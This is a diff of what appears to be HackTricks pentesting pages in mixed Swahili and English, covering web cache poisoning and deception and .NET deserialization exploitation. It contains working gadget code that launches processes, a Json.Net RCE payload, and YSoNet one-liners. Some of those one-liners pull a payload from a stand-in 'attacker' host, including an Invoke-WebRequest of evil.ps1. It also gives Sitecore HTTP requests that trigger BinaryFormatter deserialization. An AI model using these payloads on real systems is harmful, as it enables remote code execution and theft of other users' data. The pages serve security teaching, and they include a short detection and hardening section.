Cloudflare hapo awali ilihifadhi majibu ya 403. Kujaribu kufikia S3 au Azure Storage Blobs kwa vichwa vya Uidhinishaji visivyo sahihi kutasababisha jibu la 403 ambalo lilihifadhiwa. Ingawa Cloudflare imeacha kuhifadhi majibu ya 403, tabia hii inaweza bado kuwepo katika huduma zingine za proxy.
Cloudflare hapo awali ilihakikisha (cached) majibu ya 403. Kujaribu kufikia S3 au Azure Storage Blobs kwa Authorization headers zisizo sahihi kungepelekea jibu la 403 ambalo lilihifadhiwa. Ingawa Cloudflare imeacha caching ya majibu ya 403, tabia hii inaweza bado kuwepo katika proxy services zingine.
### Injecting Keyed Parameters
Caches mara nyingi hujumuisha vigezo maalum vya GET katika ufunguo wa cache. Kwa mfano, Varnish ya Fastly ilihifadhi vigezo vya `size` katika maombi. Hata hivyo, ikiwa toleo lililosajiliwa la parameter (mfano, `siz%65`) pia lilitumwa na thamani isiyo sahihi, ufunguo wa cache ungejengwa kwa kutumia parameter sahihi ya `size`. Walakini, backend ingepitia thamani katika parameter iliyoandikwa. Kuandika upya parameter ya pili ya `size` kulisababisha kuondolewa kwake na cache lakini matumizi yake na backend. Kuweka thamani ya 0 kwa parameter hii kulisababisha kosa la 400 Bad Request linaloweza kuhifadhiwa.
Caches mara nyingi hujumuisha parameters maalum za GET kwenye cache key. Kwa mfano, Varnish ya Fastly ilihakikisha parameter ya `size` katika requests. Hata hivyo, kama toleo lililotumwa kwa URL-encoding la parameter (mfano, `siz%65`) lililetwa pia na thamani isiyo sahihi, cache key ingejengwa kwa kutumia parameter sahihi ya `size`. Hata hivyo, backend itashughulikia thamani katika parameter iliyokuwa URL-encoded. Kufanya URL-encoding kwa parameter ya pili `size` kulisababisha kutokujumuishwa kwake na cache lakini kutumika na backend. Kuipa thamani ya 0 parameter hii kulipelekea kosa la 400 Bad Request ambalo lingeweza kuhifadhiwa na cache.
### User Agent Rules
Wajenzi wengine huzuia maombi na wakala wa mtumiaji wanaofanana na wale wa zana zenye trafiki kubwa kama FFUF au Nuclei ili kudhibiti mzigo wa seva. Kwa bahati mbaya, mbinu hii inaweza kuleta udhaifu kama vile uchafuzi wa cache na DoS.
Baadhi ya developers huzuia requests zenye user-agents zinazolingana na zana za trafiki kubwa kama FFUF au Nuclei ili kudhibiti mzigo wa server. Kwa uwazi, njia hii inaweza kuleta udhaifu kama cache poisoning na DoS.
### Illegal Header Fields
[RF7230](https://datatracker.ietf.mrg/doc/html/rfc7230) inabainisha wahusika wanaokubalika katika majina ya vichwa. Vichwa vinavyokuwa na wahusika nje ya anuwai ya **tchar** vinapaswa kwa kawaida kusababisha jibu la 400 Bad Request. Katika mazoezi, seva hazifuati viwango hivi kila wakati. Mfano maarufu ni Akamai, ambayo inasambaza vichwa vyenye wahusika batili na kuhifadhi kosa lolote la 400, mradi tu kichwa cha `cache-control` hakipo. Mfano wa kutumika ulitambuliwa ambapo kutuma kichwa chenye wahusika haramu, kama `\`, kutasababisha kosa la 400 Bad Request linaloweza kuhifadhiwa.
[https://datatracker.ietf.mrg/doc/html/rfc7230](https://datatracker.ietf.mrg/doc/html/rfc7230) inabainisha characters zinazoruhusiwa kwenye header names. Headers zenye characters zisizo ndani ya range ya **tchar** kwa kawaida zinapaswa kusababisha jibu la 400 Bad Request. Katika utekelezaji, servers si kila wakati zinafuata standard hii. Mfano muhimu ni Akamai, ambayo inapeleka headers zenye characters zisizo halali na inahifadhi (cache) kosa lolote la 400, mradi tu header `cache-control` haipo. Muundo unaoweza kutumika ulitambuliwa ambapo kutuma header yenye character isiyokubalika, kama `\`, kungepelekea kosa la 400 Bad Request linaloweza kuhifadhiwa na cache.
### Finding new headers
### Kupata headers mpya
[https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6](https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6)
## Cache Deception
Lengo la Cache Deception ni kuwafanya wateja **kupakia rasilimali ambazo zitahifadhiwa na cache zikiwa na taarifa zao nyeti**.
The goal of Cache Deception is to make clients **load resources that are going to be saved by the cache with their sensitive information**.
Kwanza kabisa kumbuka kwamba **nyongeza** kama vile `.css`, `.js`, `.png` nk kwa kawaida **zimepangwa** kuhifadhiwa katika **cache.** Hivyo, ikiwa unapata `www.example.com/profile.php/nonexistent.js` cache itahifadhi jibu kwa sababu inaona nyongeza ya `.js`. Lakini, ikiwa **programu** inarejelea na maudhui ya **nyeti** ya mtumiaji yaliyohifadhiwa katika _www.example.com/profile.php_, unaweza **kuiba** maudhui hayo kutoka kwa watumiaji wengine.
Kwanza kumbuka kwamba **extensions** kama `.css`, `.js`, `.png` n.k. kawaida huwa **configured** kuhifadhiwa katika **cache.** Kwa hivyo, ikiwa utafikia `www.example.com/profile.php/nonexistent.js` cache inaweza kuhifadhi response kwa sababu inaona `.js` **extension**. Lakini, ikiwa **application** inarudisha maudhui nyeti ya mtumiaji yaliyohifadhiwa katika _www.example.com/profile.php_, unaweza **kuiba** yale maudhui kutoka kwa watumiaji wengine.
Mambo mengine ya kujaribu:
@ -248,19 +268,19 @@ Mambo mengine ya kujaribu:
- _www.example.com/profile.php/test.js_
- _www.example.com/profile.php/../test.js_
- _www.example.com/profile.php/%2e%2e/test.js_
- _Tumia nyongeza zisizojulikana kama_ `.avif`
- _Tumia extensions zisizojulikana kama_ `.avif`
Mfano mwingine wazi sana unaweza kupatikana katika andiko hili: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).\
Katika mfano, inaelezwa kwamba ikiwa unapata ukurasa usio na kuwepo kama _http://www.example.com/home.php/non-existent.css_ maudhui ya _http://www.example.com/home.php_ (**pamoja na taarifa nyeti za mtumiaji**) yatarudishwa na seva ya cache itahifadhi matokeo.\
Kisha, **mshambuliaji** anaweza kufikia _http://www.example.com/home.php/non-existent.css_ kwenye kivinjari chao na kuona **taarifa za siri** za watumiaji ambao walifika hapo awali.
Another very clear example can be found in this write-up: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).\
Katika mfano, inafafanuliwa kuwa ikiwa unapakia ukurasa usiopo kama _http://www.example.com/home.php/non-existent.css_ yaliyomo ya _http://www.example.com/home.php_ (**yenye taarifa nyeti za mtumiaji**) yatarudishwa na server ya cache itahifadhi matokeo.\
Kisha, **attacker** anaweza kufikia _http://www.example.com/home.php/non-existent.css_ kwenye kivinjari chake na kuona **taarifa za siri** za watumiaji waliotembelea hapo awali.
Kumbuka kwamba **cache proxy** inapaswa kuwa **imepangwa** kuhifadhi faili **kulingana** na **nyongeza** ya faili (_.css_) na si kulingana na aina ya maudhui. Katika mfano _http://www.example.com/home.php/non-existent.css_ itakuwa na aina ya maudhui ya `text/html` badala ya aina ya mime ya `text/css` (ambayo inatarajiwa kwa faili ya _.css_).
Tambua kwamba **cache proxy** inapaswa kuwa **configured** kuhifadhi files **kwa msingi** wa **extension** ya file (_.css_) na siyo msingi wa content-type. Katika mfano _http://www.example.com/home.php/non-existent.css_ itakuwa na content-type `text/html` badala ya `text/css` mime type.
Jifunze hapa jinsi ya kutekeleza [Cache Deceptions attacks abusing HTTP Request Smuggling](../http-request-smuggling/index.html#using-http-request-smuggling-to-perform-web-cache-deception).
Jifunze hapa kuhusu jinsi ya kufanya[ Cache Deceptions attacks abusing HTTP Request Smuggling](../http-request-smuggling/index.html#using-http-request-smuggling-to-perform-web-cache-deception).
## Automatic Tools
## Vifaa Otomatiki
- [**toxicache**](https://github.com/xhzeem/toxicache): Skana ya Golang kutafuta udhaifu wa uchafuzi wa cache ya wavuti katika orodha ya URLs na kujaribu mbinu mbalimbali za kuingiza.
- [**toxicache**](https://github.com/xhzeem/toxicache): Golang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
## References
@ -272,6 +292,7 @@ Jifunze hapa jinsi ya kutekeleza [Cache Deceptions attacks abusing HTTP Request
- [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/)
- [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/)
- [Burp Proxy Match & Replace](https://portswigger.net/burp/documentation/desktop/tools/proxy/match-and-replace)
- [watchTowr Labs Sitecore XP cache poisoning → RCE](https://labs.watchtowr.com/cache-me-if-you-can-sitecore-experience-platform-cache-poisoning-to-rce/)
{{#include ../../banners/hacktricks-training.md}}

125
src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
View File

@ -1,38 +1,38 @@
# Msingi wa .Net deserialization (Gadget ya ObjectDataProvider, ExpandedWrapper, na Json.Net)
# Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)
{{#include ../../banners/hacktricks-training.md}}
Post hii inajitolea kwa **kuelewa jinsi gadget ya ObjectDataProvider inavyotumiwa** kupata RCE na **jinsi** maktaba za Serialization **Json.Net na xmlSerializer zinaweza kutumika vibaya** na gadget hiyo.
Chapisho hili limetengwa kuelewa jinsi gadget ObjectDataProvider inavyotumika kupata RCE na jinsi maktaba za Serialization Json.Net na xmlSerializer zinavyoweza kutumiwa vibaya pamoja na gadget hiyo.
## Gadget ya ObjectDataProvider
## ObjectDataProvider Gadget
Kutoka kwenye hati: _darasa la ObjectDataProvider linafungua na kuunda kitu ambacho unaweza kutumia kama chanzo cha uhusiano_.\
Ndio, ni maelezo ya ajabu, hivyo hebu tuone ni nini darasa hili lina ambacho ni cha kuvutia sana: Darasa hili linaruhusu **kufunga kitu chochote**, kutumia _**MethodParameters**_ kuweka **vigezo vyovyote,** na kisha **kutumia MethodName kuita kazi yoyote** ya kitu chochote kilichotangazwa kwa kutumia vigezo vyovyote.\
Hivyo, **kitu** hicho kitafanya **kazi** na **vigezo wakati kinapokuwa kinadeserialized.**
From the documentation: _the ObjectDataProvider Class Wraps and creates an object that you can use as a binding source_.
Ndiyo, ni maelezo ya kushangaza, hivyo tuone nini darasa hili linao kinachovutia: Darasa hili huruhusu **wrap an arbitrary object**, kutumia _**MethodParameters**_ kuweka vigezo vya aina yoyote, na kisha **tumia MethodName kuitisha function yoyote** ya object iliyotajwa kwa kutumia vigezo hivyo.
Kwa hivyo, object yoyote ita**tekeleza** function yenye **parameters** wakati inatengenezwa upya (being deserialized).
### **Jinsi hii inavyowezekana**
### **Jinsi hii inawezekana**
Namespace ya **System.Windows.Data**, inayopatikana ndani ya **PresentationFramework.dll** katika `C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF`, ndiko ambapo ObjectDataProvider imefafanuliwa na kutekelezwa.
The **System.Windows.Data** namespace, found within the **PresentationFramework.dll** at `C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF`, is where the ObjectDataProvider is defined and implemented.
Kwa kutumia [**dnSpy**](https://github.com/0xd4d/dnSpy) unaweza **kuangalia msimbo** wa darasa tunalolipenda. Katika picha hapa chini tunaona msimbo wa **PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Jina la njia**
Using [**dnSpy**](https://github.com/0xd4d/dnSpy) you can **inspect the code** of the class we are interested in. In the image below we are seeing the code of **PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name**
![](<../../images/image (427).png>)
Kama unavyoona wakati `MethodName` imewekwa `base.Refresh()` inaitwa, hebu tuangalie inafanya nini:
Kama unavyoona, wakati `MethodName` inawekwa `base.Refresh()` inaitwa; tuchukulie tuangalie inafanya nini:
![](<../../images/image (319).png>)
Sawa, hebu tuendelee kuona `this.BeginQuery()` inafanya nini. `BeginQuery` imezuiliwa na `ObjectDataProvider` na hii ndiyo inafanya:
Sawa, tuendelee kuona `this.BeginQuery()` inafanya nini. `BeginQuery` imeoverride na `ObjectDataProvider` na hapa ndilo linachofanya:
![](<../../images/image (345).png>)
Kumbuka kwamba mwishoni mwa msimbo inaita `this.QueryWorke(null)`. Hebu tuone inatekeleza nini:
Kumbuka mwishoni mwa msimbo inaita `this.QueryWorke(null)`. Tazama inatekeleza nini wakati inaitwa:
![](<../../images/image (596).png>)
Kumbuka kwamba hii si msimbo kamili wa kazi ya `QueryWorker` lakini inaonyesha sehemu ya kuvutia ya hiyo: Msimbo **unaita `this.InvokeMethodOnInstance(out ex);`** hii ndiyo mistari ambapo **seti ya njia inaitwa**.
Kumbuka hii si msimbo kamili wa function `QueryWorker` lakini inaonyesha sehemu ya kuvutia: Msimbo **unaita `this.InvokeMethodOnInstance(out ex);`** — hapa ndilo mstari ambapo **method iliyowekwa inaitwa**.
Ikiwa unataka kuangalia kwamba kwa kuweka tu _**MethodName**_** itatekelezwa**, unaweza kukimbia msimbo huu:
If you want to check that just setting the _**MethodName**_ **it will be executed**, you can run this code:
```java
using System.Windows.Data;
using System.Diagnostics;
@ -52,16 +52,16 @@ myODP.MethodName = "Start";
}
}
```
Kumbuka kwamba unahitaji kuongeza kama rejeleo _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ ili kupakia `System.Windows.Data`
Kumbuka kwamba unahitaji kuongeza kama reference _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ ili kupakia `System.Windows.Data`
## ExpandedWrapper
Kwa kutumia exploit iliyotangulia kutakuwa na kesi ambapo **kitu** kitakuwa **kimeondolewa** kama _**ObjectDataProvider**_ mfano (kwa mfano katika DotNetNuke vuln, kwa kutumia XmlSerializer, kitu kiliondolewa kwa kutumia `GetType`). Hivyo, hatutakuwa na **ufahamu wa aina ya kitu kilichofichwa** katika mfano wa _ObjectDataProvider_ (`Process` kwa mfano). Unaweza kupata zaidi [habari kuhusu DotNetNuke vuln hapa](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F&sandbox=1).
Ukitegemea exploit iliyotangulia, kutatokea kesi ambapo the **object** itakayokuwa **deserialized as** mfano wa _**ObjectDataProvider**_ (kwa mfano katika DotNetNuke vuln, kwa kutumia XmlSerializer, object ilideserializa kwa kutumia `GetType`). Kisha, haitakuwa na habari kuhusu aina ya object iliyofungwa ndani ya mfano wa _ObjectDataProvider_ (kwa mfano `Process`). Unaweza kupata [maelezo zaidi kuhusu DotNetNuke vuln hapa](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F&sandbox=1).
Darasa hili linaruhusu s**pecify aina za vitu vya vitu vilivyofichwa** katika mfano fulani. Hivyo, darasa hili linaweza kutumika kuficha kitu cha chanzo (_ObjectDataProvider_) ndani ya aina mpya ya kitu na kutoa mali tunazohitaji (_ObjectDataProvider.MethodName_ na _ObjectDataProvider.MethodParameters_).\
Hii ni muhimu sana kwa kesi kama ile iliyowasilishwa hapo awali, kwa sababu tutakuwa na uwezo wa **kuficha \_ObjectDataProvider**_** ndani ya mfano wa **_**ExpandedWrapper** \_ na **wakati wa kuondolewa** darasa hili litaunda _**OjectDataProvider**_ kitu ambacho kitafanya **kazi** iliyoonyeshwa katika _**MethodName**_.
Class hii inaruhusu **kuainisha aina za object za vitu vinavyofungwa** katika instance fulani. Hivyo, class hii inaweza kutumika kufunga source object (_ObjectDataProvider_) ndani ya aina mpya ya object na kutoa properties tunazohitaji (_ObjectDataProvider.MethodName_ na _ObjectDataProvider.MethodParameters_).\
Hii ni muhimu sana kwa kesi kama ile iliyoonyeshwa hapo awali, kwa sababu tutakuwa na uwezo wa **wrap _ObjectDataProvider_ inside an _ExpandedWrapper_ instance** na **when deserialized** class hii itakuwa inafanya **create** object ya _**OjectDataProvider**_ ambayo ita**execute** function iliyoonyeshwa katika _**MethodName**_.
Unaweza kuangalia wrapper hii kwa kutumia msimbo ufuatao:
You can check this wrapper with the following code:
```java
using System.Windows.Data;
using System.Diagnostics;
@ -85,11 +85,11 @@ myExpWrap.ProjectedProperty0.MethodName = "Start";
```
## Json.Net
Katika [ukurasa rasmi](https://www.newtonsoft.com/json) inabainishwa kwamba maktaba hii inaruhusu **Kuhifadhi na kufungua tena kitu chochote cha .NET kwa kutumia serializer wa JSON wenye nguvu wa Json.NET**. Hivyo, ikiwa tunaweza **kufungua tena gadget ya ObjectDataProvider**, tunaweza kusababisha **RCE** kwa kufungua tena kitu.
Katika [official web page](https://www.newtonsoft.com/json) inaonyesha kwamba maktaba hii inaruhusu **Serialize and deserialize any .NET object with Json.NET's powerful JSON serializer**. Kwa hiyo, ikiwa tunaweza **deserialize the ObjectDataProvider gadget**, tunaweza kusababisha **RCE** kwa ku-deserialize tu object.
### Mfano wa Json.Net
### Json.Net example
Kwanza kabisa, hebu tuone mfano wa jinsi ya **kuhifadhi/kufungua tena** kitu kwa kutumia maktaba hii:
Kwanza kabisa tuchunguze mfano jinsi ya **serialize/deserialize** object kutumia maktaba hii:
```java
using System;
using Newtonsoft.Json;
@ -132,11 +132,11 @@ Console.WriteLine(desaccount.Email);
}
}
```
### Abusing Json.Net
### Kutumia vibaya Json.Net
Using [ysoserial.net](https://github.com/pwntester/ysoserial.net) niliunda exploit:
Kutumia [ysoserial.net](https://github.com/pwntester/ysoserial.net) nilitengeneza exploit:
```java
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
yoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
@ -147,7 +147,7 @@ ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
```
Katika hii code unaweza **kujaribu exploit**, endesha tu na utaona kwamba calc inatekelezwa:
Katika msimbo huu unaweza **jaribu exploit**, endesha tu na utaona kwamba calc itaanzishwa:
```java
using System;
using System.Text;
@ -184,27 +184,27 @@ TypeNameHandling = TypeNameHandling.Auto
}
}
```
## Advanced .NET Gadget Chains (YSoNet & ysoserial.net)
## Mnyororo ya Gadget za Advanced .NET (YSoNet & ysoserial.net)
Teknolojia ya ObjectDataProvider + ExpandedWrapper iliyotambulishwa hapo juu ni moja tu ya MIFUMO MINGI ya gadget ambazo zinaweza kutumika vibaya wakati programu inafanya **deserialization isiyo salama ya .NET**. Zana za kisasa za red-team kama **[YSoNet](https://github.com/irsdl/ysonet)** (na ya zamani [ysoserial.net](https://github.com/pwntester/ysoserial.net)) zinaweza kuunda **grafu za vitu vya uhalifu zenye matumizi tayari** kwa mamia ya gadgets na muundo wa serialization.
Mbinu ya ObjectDataProvider + ExpandedWrapper iliyotanguliwa hapo juu ni moja tu kati ya MNYA mnyororo za gadget zinazoweza kutumiwa wakati programu inafanya **unsafe .NET deserialization**. Zana za kisasa za red-team kama **[YSoNet](https://github.com/irsdl/ysonet)** (na ile ya zamani [ysoserial.net](https://github.com/pwntester/ysoserial.net)) zinafanya otomatiki uundaji wa **ready-to-use malicious object graphs** kwa micolonyo mingi ya gadget na miundo ya serialization.
Hapa chini kuna rejeleo lililokandamizwa la mnyororo wa gadgets wenye manufaa zaidi uliotolewa na *YSoNet* pamoja na maelezo ya haraka ya jinsi zinavyofanya kazi na amri za mfano za kuzalisha payloads.
Hapo chini ni rejea iliyoshinikizwa ya mnyororo muhimu zaidi zinazotoka ndani ya *YSoNet* pamoja na ufafanuzi mfupi wa jinsi zinavyofanya kazi na mifano ya amri za kuunda payload.
| Gadget Chain | Key Idea / Primitive | Common Serializers | YSoNet one-liner |
|--------------|----------------------|--------------------|------------------|
| **TypeConfuseDelegate** | Inaharibu rekodi ya `DelegateSerializationHolder` ili, mara tu inapokuwa na mwili, delegate ielekeze kwenye *yoyote* njia iliyotolewa na mshambuliaji (mfano `Process.Start`) | `BinaryFormatter`, `SoapFormatter`, `NetDataContractSerializer` | `ysonet.exe TypeConfuseDelegate "calc.exe" > payload.bin` |
| **ActivitySurrogateSelector** | Inatumia `System.Workflow.ComponentModel.ActivitySurrogateSelector` ili *kuepuka uainishaji wa aina za .NET ≥4.8* na moja kwa moja kuita **kijenga** cha darasa lililotolewa au **kuandika** faili ya C# papo hapo | `BinaryFormatter`, `NetDataContractSerializer`, `LosFormatter` | `ysonet.exe ActivitySurrogateSelectorFromFile ExploitClass.cs;System.Windows.Forms.dll > payload.dat` |
| **DataSetOldBehaviour** | Inatumia **uwakilishi wa zamani wa XML** wa `System.Data.DataSet` ili kuunda aina zisizo na mipaka kwa kujaza maeneo ya `<ColumnMapping>` / `<DataType>` (kwa hiari ikifanya uongo wa assembly kwa `--spoofedAssembly`) | `LosFormatter`, `BinaryFormatter`, `XmlSerializer` | `ysonet.exe DataSetOldBehaviour "<DataSet>…</DataSet>" --spoofedAssembly mscorlib > payload.xml` |
| **GetterCompilerResults** | Katika mazingira ya WPF (> .NET 5) inachanganya wapokeaji wa mali hadi kufikia `System.CodeDom.Compiler.CompilerResults`, kisha *inaandika* au *inaongeza* DLL iliyotolewa na `-c` | `Json.NET` typeless, `MessagePack` typeless | `ysonet.exe GetterCompilerResults -c Loader.dll > payload.json` |
| **ObjectDataProvider** (review) | Inatumia WPF `System.Windows.Data.ObjectDataProvider` kuita njia isiyo na mipaka ya static kwa hoja zilizo na udhibiti. YSoNet inaongeza toleo la `--xamlurl` la urahisi kuhost XAML mbaya kwa mbali | `BinaryFormatter`, `Json.NET`, `XAML`, *n.k.* | `ysonet.exe ObjectDataProvider --xamlurl http://attacker/o.xaml > payload.xaml` |
| **PSObject (CVE-2017-8565)** | Inajumuisha `ScriptBlock` ndani ya `System.Management.Automation.PSObject` inayotekelezwa wakati PowerShell inafanya deserialization ya kitu | PowerShell remoting, `BinaryFormatter` | `ysonet.exe PSObject "Invoke-WebRequest http://attacker/evil.ps1" > psobj.bin` |
| Gadget Chain | Wazo Kuu / Primitive | Serializers Za Kawaida | YSoNet one-liner |
|--------------|----------------------|------------------------|------------------|
| **TypeConfuseDelegate** | Inaharibu rekodi ya `DelegateSerializationHolder` ili, mara ikirejeshwa, delegate itamwelekeza kwenye *method* yoyote iliyotolewa na mshambuliaji (kwa mfano `Process.Start`) | `BinaryFormatter`, `SoapFormatter`, `NetDataContractSerializer` | `ysonet.exe TypeConfuseDelegate "calc.exe" > payload.bin` |
| **ActivitySurrogateSelector** | Inatumia vibaya `System.Workflow.ComponentModel.ActivitySurrogateSelector` ili *kuipita type-filtering ya .NET ≥4.8* na kuitisha moja kwa moja **constructor** ya darasa lililotolewa au **kucompile** faili ya C# kwa wakati huo | `BinaryFormatter`, `NetDataContractSerializer`, `LosFormatter` | `ysonet.exe ActivitySurrogateSelectorFromFile ExploitClass.cs;System.Windows.Forms.dll > payload.dat` |
| **DataSetOldBehaviour** | Inatumia uwakilishi wa **XML wa zamani** wa `System.Data.DataSet` kuanzisha aina yoyote kwa kujaza sehemu za `<ColumnMapping>` / `<DataType>` (kwa hiari kuiga assembly kwa `--spoofedAssembly`) | `LosFormatter`, `BinaryFormatter`, `XmlSerializer` | `ysonet.exe DataSetOldBehaviour "<DataSet>…</DataSet>" --spoofedAssembly mscorlib > payload.xml` |
| **GetterCompilerResults** | Kwa runtimes zilizo na WPF (> .NET 5) inachomeka getters za mali hadi kufikia `System.CodeDom.Compiler.CompilerResults`, kisha *inacompile* au *inapakia* DLL iliyotolewa na `-c` | `Json.NET` typeless, `MessagePack` typeless | `ysonet.exe GetterCompilerResults -c Loader.dll > payload.json` |
| **ObjectDataProvider** (review) | Inatumia WPF `System.Windows.Data.ObjectDataProvider` kuita method static yoyote yenye arguments zinazodhibiwa. YSoNet inaongeza chaguo la `--xamlurl` ili kuhost malicioius XAML kwa mbali | `BinaryFormatter`, `Json.NET`, `XAML`, *etc.* | `ysonet.exe ObjectDataProvider --xamlurl http://attacker/o.xaml > payload.xaml` |
| **PSObject (CVE-2017-8565)** | Inaweka `ScriptBlock` ndani ya `System.Management.Automation.PSObject` ambalo linafanywa wakati PowerShell inadeserialise object | PowerShell remoting, `BinaryFormatter` | `ysonet.exe PSObject "Invoke-WebRequest http://attacker/evil.ps1" > psobj.bin` |
> [!TIP]
> Payload zote zina **andikwa kwenye *stdout*** kwa chaguo-msingi, na kufanya iwe rahisi kuzipitisha kwenye zana nyingine (mfano: ViewState generators, base64 encoders, HTTP clients).
> Payload zote huandikwa kwa **stdout** kwa chaguo-msingi, kufanya iwe rahisi kuzitumia kwa kupipa (pipe) kwenye zana nyingine (mfano ViewState generators, base64 encoders, HTTP clients).
### Building / Installing YSoNet
### Kujenga / Kuisakinisha YSoNet
Ikiwa hakuna binaries zilizotengenezwa awali zinapatikana chini ya *Actions ➜ Artifacts* / *Releases*, amri ifuatayo ya **PowerShell** itaunda mazingira ya kujenga, kunakili hifadhi na kuunda kila kitu katika *Release* mode:
Ikiwa hakuna binaries zilizojengwa tayari zinapatikana chini ya *Actions ➜ Artifacts* / *Releases*, PowerShell one-liner ifuatayo itaweka mazingira ya kujenga, kukuza repository na kucompile kila kitu katika mode ya *Release*:
```powershell
Set-ExecutionPolicy Bypass -Scope Process -Force;
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
@ -216,17 +216,48 @@ cd ysonet
nuget restore ysonet.sln
msbuild ysonet.sln -p:Configuration=Release
```
The compiled `ysonet.exe` inaweza kupatikana chini ya `ysonet/bin/Release/`.
The compiled `ysonet.exe` can then be found under `ysonet/bin/Release/`.
### Detection & Hardening
* **Gundua** michakato ya watoto isiyotarajiwa ya `w3wp.exe`, `PowerShell.exe`, au mchakato wowote unaofanya deserialization ya data iliyotolewa na mtumiaji (mfano `MessagePack`, `Json.NET`).
* Wezesha na **lazimisha uchujaji wa aina** (`TypeFilterLevel` = *Full*, `SurrogateSelector` ya kawaida, `SerializationBinder`, *n.k.*) kila wakati `BinaryFormatter` / `NetDataContractSerializer` ya zamani haiwezi kuondolewa.
* Pale inapowezekana hamasisha **`System.Text.Json`** au **`DataContractJsonSerializer`** na converters za msingi wa orodha nyeupe.
* Zuia maktaba hatari za WPF (`PresentationFramework`, `System.Workflow.*`) zisipakuliwe katika michakato ya wavuti ambazo hazipaswi kuzihitaji kamwe.
### Ugundaji & Kuimarisha
* **Gundua** unexpected child processes of `w3wp.exe`, `PowerShell.exe`, or any process deserialising user-supplied data (e.g. `MessagePack`, `Json.NET`).
* Wezesha na **lazimisha type-filtering** (`TypeFilterLevel` = *Full*, custom `SurrogateSelector`, `SerializationBinder`, *etc.*) kila inapowezekana wakati legacy `BinaryFormatter` / `NetDataContractSerializer` haziwezi kuondolewa.
* Ambapo inawezekana hamisha kwenda **`System.Text.Json`** au **`DataContractJsonSerializer`** kwa converters zinazotegemea orodha ya kuruhusiwa.
* Zuia WPF assemblies hatari (`PresentationFramework`, `System.Workflow.*`) kupewa load katika web processes ambazo hazipaswi kuhitaji.
## References
## Mfano halisi wa sink: Sitecore convertToRuntimeHtml → BinaryFormatter
Sink ya vitendo ya .NET inayoweza kufikiwa katika mtiririko wa Sitecore XP Content Editor yenye uthibitisho:
- Sink API: `Sitecore.Convert.Base64ToObject(string)` inafunika `new BinaryFormatter().Deserialize(...)`.
- Njia ya kuanzisha: pipeline `convertToRuntimeHtml``ConvertWebControls`, ambayo inatafuta kipengele jirani chenye `id="{iframeId}_inner"` na inasoma attribute ya `value` ambayo inachukuliwa kama data iliyoseriwalishwa iliyofungwa kwa base64. Matokeo hubadilishwa kuwa string na kuyaingiza kwenye HTML.
Minimal endtoend (iliyothibitishwa):
```
// Load HTML into EditHtml session
POST /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.aspx
Content-Type: application/x-www-form-urlencoded
__PARAMETERS=edithtml:fix&...&ctl00$ctl00$ctl05$Html=
<html>
<iframe id="test" src="poc"></iframe>
<dummy id="test_inner" value="BASE64_BINARYFORMATTER"></dummy>
</html>
// Server returns a handle; visiting FixHtml.aspx?hdl=... triggers deserialization
GET /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.FixHtml.aspx?hdl=...
```
- Gadget: mnyororo wowote wa BinaryFormatter unaorejesha string (madhara ya pembeni yanaendeshwa wakati wa deserialization). Angalia YSoNet/ysoserial.net ili kuzalisha payloads.
Kwa mnyororo kamili unaoanza preauth kwa HTML cache poisoning katika Sitecore na unaoelekeza kwa sink hii:
{{#ref}}
../../network-services-pentesting/pentesting-web/sitecore/README.md
{{#endref}}
## Marejeo
- [YSoNet .NET Deserialization Payload Generator](https://github.com/irsdl/ysonet)
- [ysoserial.net original PoC tool](https://github.com/pwntester/ysoserial.net)
- [Microsoft CVE-2017-8565](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-8565)
- [watchTowr Labs Sitecore XP cache poisoning → RCE](https://labs.watchtowr.com/cache-me-if-you-can-sitecore-experience-platform-cache-poisoning-to-rce/)
{{#include ../../banners/hacktricks-training.md}}